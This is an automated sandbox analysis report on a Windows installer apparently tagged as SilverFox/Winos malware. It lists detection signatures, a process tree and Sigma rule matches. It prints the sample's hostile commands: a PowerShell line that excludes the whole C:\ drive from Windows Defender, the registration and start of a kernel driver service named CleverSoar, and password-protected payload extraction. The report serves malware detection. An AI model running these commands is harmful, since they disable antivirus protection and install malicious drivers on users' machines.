Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.1.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b1.0.1.exe
renamed because original name is a hash value
Original sample name:1.0.1.exe
Analysis ID:1580229
MD5:f2845d6410a0d9a090d414f3ae742e3b
SHA1:a27e62687254f001c08b5313465d2ed1870f0eb5
SHA256:f56c3d038c408355f6fb191865ca5650b29926f65b78d02b008b509bf640e588
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b1.0.1.exe (PID: 1560 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" MD5: F2845D6410A0D9A090D414F3AE742E3B)
    • #U5b89#U88c5#U52a9#U624b1.0.1.tmp (PID: 5972 cmdline: "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" MD5: F0D4EEA505CEB561AB4AD622E3C0B9D5)
      • powershell.exe (PID: 5908 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7056 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b1.0.1.exe (PID: 1892 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT MD5: F2845D6410A0D9A090D414F3AE742E3B)
        • #U5b89#U88c5#U52a9#U624b1.0.1.tmp (PID: 2352 cmdline: "C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20492,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT MD5: F0D4EEA505CEB561AB4AD622E3C0B9D5)
          • 7zr.exe (PID: 4296 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 1292 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2924 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2172 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2680 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5628 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6196 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6176 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1488 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4296 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2680 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2284 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1576 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1488 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2924 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2680 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1272 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2724 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2820 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5972 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3176 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4296 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6160 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1272 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1488 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5628 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2924 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6160 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1784 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1988 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7092 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3224 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7124 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6480 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5268 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1784 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3116 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1784 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1988 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp, ParentProcessId: 5972, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5908, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2924, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 2172, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp, ParentProcessId: 5972, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5908, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2924, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 2172, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp, ParentProcessId: 5972, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5908, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeVirustotal: Detection: 6%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 90.5% probability
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2113537072.0000000001380000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2113433554.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9BAEC0 FindFirstFileA,FindClose,FindClose,6_2_6C9BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00716868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00716868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00717496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00717496
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
